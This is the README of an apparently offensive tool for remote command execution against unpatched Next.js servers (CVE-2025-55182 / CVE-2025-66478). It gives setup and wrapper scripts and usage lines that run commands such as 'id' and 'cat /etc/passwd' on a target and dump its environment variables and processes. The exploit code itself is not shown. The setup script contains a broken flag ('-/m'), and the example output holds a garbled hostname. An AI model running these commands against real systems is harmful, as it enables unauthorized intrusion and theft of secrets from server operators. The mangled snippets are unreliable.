Share
## https://sploitus.com/exploit?id=F7E1635F-D256-5507-B45D-5DFE86195CEE
# πŸš€ React2Shell Exploiter  
### Advanced Exploitation & Server Intelligence for CVE-2025-55182 / CVE-2025-66478

> ⚠️ **For authorized security testing only.**  
> This tool exploits a critical RCE vulnerability in unpatched Next.js applications. Use responsibly and legally.

---

## πŸ” Overview

`react2shell-exploit.py` is a precision weapon for **confirmed exploitation** of the **React2Shell** vulnerability (CVE-2025-55182 / CVE-2025-66478). Unlike basic scanners, it:

- βœ… **Executes arbitrary OS commands** on vulnerable Next.js servers.
- βœ… **Dumps comprehensive server intelligence** (OS, user, env vars, processes, etc.).
- βœ… **Detects and extracts outputs** via the `X-Action-Redirect` side-channel.
- βœ… **Supports Linux and Windows** targets.
- βœ… **Saves full forensic data** to `react2shell_dump.json`.

Perfect for **penetration testers**, **bug bounty hunters**, and **red teams** needing proof-of-compromise and post-exploitation context.

---

## πŸ“¦ Setup

### Prerequisites
- Python 3.9+
- `git` (to clone the repo)

### Installation
```bash
git clone https://github.com/your-username/react2shell-exploiter.git
cd react2shell-exploiter
./setup.sh
```

> πŸ“ The `setup.sh` script:
> - Creates a virtual environment (`venv/`)
> - Installs dependencies from `requirements.txt`

#### `requirements.txt`
```txt
requests>=2.28.0
```

---

## ▢️ Usage

Use the included `run.sh` wrapper to automatically activate the virtual environment and execute the script.

### Basic Command Execution
```bash
./run.sh react2shell-exploit.py http://target.com -c "id"
```

### Full Server Intelligence (Default Behavior)
```bash
./run.sh react2shell-exploit.py http://target.com
# Executes `id` and dumps full server info
```

### Windows Target
```bash
./run.sh react2shell-exploit.py http://win-target.com --windows -c "whoami"
```

### Custom Paths
```bash
./run.sh react2shell-exploit.py http://target.com --path /_next --path /api
```

### Direct Python Execution (Advanced)
```bash
./run.sh ./react2shell-exploit.py http://target.com -c "cat /etc/passwd"
```

---

## πŸ› οΈ Included Scripts

### `setup.sh`
```bash
#!/bin/bash
echo "πŸ”§ Setting up VulnQuest virtual environment..."
python3 -/m venv venv
source venv/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
echo "βœ… VulnQuest environment ready!"
```

### `run.sh`
```bash
#!/bin/bash
PROJECT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
VENV_DIR="$PROJECT_DIR/venv"

if [ ! -d "$VENV_DIR" ]; then
    echo "❌ Run ./setup.sh first!"
    exit 1
fi

cleanup() {
    echo -e "\nπŸ”’ Deactivating environment..."
    deactivate 2>/dev/null
    exit 0
}
trap cleanup EXIT INT TERM

source "$VENV_DIR/bin/activate"

if [[ "$1" == *"/"* ]] || [[ "$1" == *.py ]]; then
    python "$@"
else
    python -m "$@"
fi
```

> πŸ’‘ **Why `run.sh`?**  
> Ensures consistent execution within the isolated virtual environmentβ€”no more `ModuleNotFoundError`!

---

## πŸ“ Output

On successful exploitation, the tool:
- Prints **real-time command output**.
- Displays a **structured server intelligence dump**.
- Saves all data to **`react2shell_dump.json`** for reporting.

Example output:
```
βœ… Command executed successfully on: http://target.com:3000/
[OUTPUT]
ip-http://target.com.compute.internal

πŸ–₯️  SERVER INFORMATION DUMP
...
πŸ’Ύ Full dump saved to: react2shell_dump.json
```

---

## ⚠️ Ethical & Legal Notice

This tool is **strictly for educational and authorized security testing purposes**.  
Unauthorized use against systems you do not own or lack explicit permission to test is **illegal** and violates cybersecurity laws worldwide.

By using this software, you agree to:
- Comply with all applicable laws and regulations.
- Obtain explicit written permission before testing any system.
- Use findings responsibly and report them to the appropriate stakeholders.

---

## πŸ“ž Support

For issues or feature requests, open an issue in the repository.

---

 πŸ” **Stay sharp. Stay ethical.**  
 β€” The React2Shell Exploiter Team

---